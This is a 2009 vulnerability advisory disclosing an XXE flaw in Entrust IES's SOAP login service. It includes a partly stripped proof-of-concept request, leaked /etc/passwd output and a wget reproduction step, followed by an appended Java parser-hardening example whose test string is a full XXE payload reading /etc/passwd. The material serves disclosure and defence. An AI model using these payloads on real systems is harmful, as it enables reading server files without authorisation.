Entrust IES Vulnerable to XXE Attacks
=====================================

Sverre H. Huseby
2009-06-15

Micro summary: Using specially crafted SOAP requests, it is possible to make IES return the contents of (some) server-local files.

The Identification and Entitlements Server (IES) from Entrust appears to be vulnerable to XML External Entity (XXE) attacks. This kind of attack was first described by Gregory Steuck in a post to Bugtraq in 2002:

  http://www.securityfocus.com/archive/1/297714

For another XXE attack example, see my report of a similar bug in Adobe Reader in 2005:

  http://shh.thathost.com/secadv/adobexxe/

Note: This attack has only been tested with the CredentialCollector service. It may be present in other parts of IES as well, and even in other Entrust products relying on incoming XML messages (e.g. SOAP-based services).

In order to provide programmatic login based on username and password, the CredentialCollector accepts incoming SOAP messages that look like this:

  JoeBossman
  Apple1995
  saml:Assertion
  ReqIssue

If the incoming username refers to a non-existing user, the response will include the following tag:

  Unknown user - JoeBossman

You may notice that the ns1:Username from the request has been echoed back in the response. Let's try passing a request in which the username is not plain text, but rather an entity that refers to a local file on the computer. We modify the above request to look like this:

  ]>
  &xxe;
  Apple1995
  saml:Assertion
  ReqIssue

Note the addition of a DOCTYPE defining the entity "xxe" as a reference to the file /etc/passwd, and the ns1:Username tag that now contains a reference to the new entity.
When we pass this request to the server, we get a reply that contains the following:

  Unknown user - root:x:0:0:Super-User-ast-win06:/root:/sbin/sh
  daemon:x:1:1::/:
  bin:x:2:2::/usr/bin:
  sys:x:3:3::/:
  adm:x:4:4:Admin:/var/adm:
  lp:x:71:8:Line Printer Admin:/usr/spool/lp:
  uucp:x:5:5:uucp Admin:/usr/lib/uucp:
  nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
  smmsp:x:25:25:SendMail Message Submission Program:/:
  listen:x:37:4:Network Admin:/usr/net/nls:
  gdm:x:50:50:GDM Reserved UID:/:
  webservd:x:80:80:WebServer Reserved UID:/:
  postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
  svctag:x:95:12:Service Tag UID:/:
  nobody:x:60001:60001:NFS Anonymous Access User:/:
  noaccess:x:60002:60002:No Access User:/:
  nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
  entrust:x:4000:4000:Telenor WIN user:/home/entrust:/usr/bin/bash

(A lot of lines have been removed from the output for obvious reasons.)

You will probably recognize the output as a typical Solaris /etc/passwd file.

Note: The attack is limited to files containing text that the XML parser will allow at the place the External Entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be includable.

Steps to Reproduce
------------------

* Save the above XML in a file named xxe.xml
* Edit the file so that the first line has no leading whitespace.
* Use wget to post the contents of the file to a GetAccess server with IES support (replace HOSTNAME with the correct name):

    wget -S -O- --post-file=xxe.xml \
        http://HOSTNAME:50002/ies/CredentialCollector

Solution
--------

Entrust should make sure the XML parser will not follow URIs to External Entities, or make it follow known good URIs (white-listed URIs) only. With some parsers one may install a custom-made entity resolver and have it control the inclusion of the URI.
With other parsers one can instead just say setExpandEntityReferences(false), but note that this setting may be ignored by some of the parsers. Testing will be needed.

Notification Tracking
---------------------

2009-06-15: Entrust notified.
2010-02-10: Patch available: https://secure.entrust.com/trustedcare/troubleshooting/e10-004.pdf
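As an added illustration of the Solution section (example code written for this page, not Entrust's or the advisory author's), the JAXP configuration below applies both suggested fixes: parser features that refuse a DOCTYPE and external entities, plus a custom EntityResolver that never follows a URI, with setExpandEntityReferences(false) shown only alongside them because of the caveat above. The constructed test request reuses the advisory's DOCTYPE/ENTITY pattern, but its element names are placeholders, since the full SOAP envelope is not reproduced on this page.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedSoapParser {
  // Constructed stand-in for the advisory's request: the real SOAP envelope is not
  // reproduced, but the DOCTYPE/ENTITY pattern pointing at a local file is the same.
  static final String XXE_REQUEST =
      "<?xml version=\"1.0\"?>\n"
    + "<!DOCTYPE login [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
    + "<login><Username>&xxe;</Username><Password>Apple1995</Password></login>";

  // Factory that rejects any DOCTYPE and, for defence in depth, also disables
  // external entities and external DTD loading (Xerces/JAXP feature URIs).
  static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
    DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
    // No DOCTYPE means no entity declarations, which closes the hole outright.
    f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // If a deployment must allow DTDs, these stop SYSTEM URIs from being fetched.
    f.setFeature("http://xml.org/sax/features/external-general-entities", false);
    f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    f.setXIncludeAware(false);
    // On Xerces this alone does not prevent the file read (the advisory's caveat).
    f.setExpandEntityReferences(false);
    return f;
  }

  // The advisory's other option, a custom resolver: every external entity yields
  // empty content, so no local file or remote URL is ever opened.
  static final EntityResolver DENY_ALL =
      (publicId, systemId) -> new InputSource(new StringReader(""));

  // Returns true if the parser accepted the message, false if it rejected it.
  static boolean accepts(String xml) throws Exception {
    DocumentBuilder db = hardenedFactory().newDocumentBuilder();
    db.setEntityResolver(DENY_ALL);
    try {
      return db.parse(new InputSource(new StringReader(xml))) != null;
    } catch (SAXParseException e) {
      return false;  // disallow-doctype-decl rejects the XXE request at this point
    }
  }

  public static void main(String[] args) throws Exception {
    System.out.println("XXE request accepted: " + accepts(XXE_REQUEST));
    System.out.println("Plain login accepted: "
        + accepts("<login><Username>JoeBossman</Username></login>"));
  }
}
```

Running it with the JDK's built-in Xerces shows the DOCTYPE-carrying request rejected while the plain login still parses; keep the EntityResolver even where the features work, since it is the fallback the advisory recommends for parsers that ignore such settings.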